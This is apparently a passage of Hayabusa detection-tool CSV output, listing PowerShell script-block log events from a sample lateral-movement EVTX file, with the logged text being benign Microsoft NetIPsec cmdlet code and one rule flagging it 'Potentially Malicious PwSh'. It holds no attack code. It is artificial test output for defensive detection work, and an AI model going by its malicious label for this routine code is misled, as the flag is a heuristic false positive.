Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,") -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' -Alias '*' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' -Alias '*' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,") -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' -Alias '*' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' -Alias '*' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] 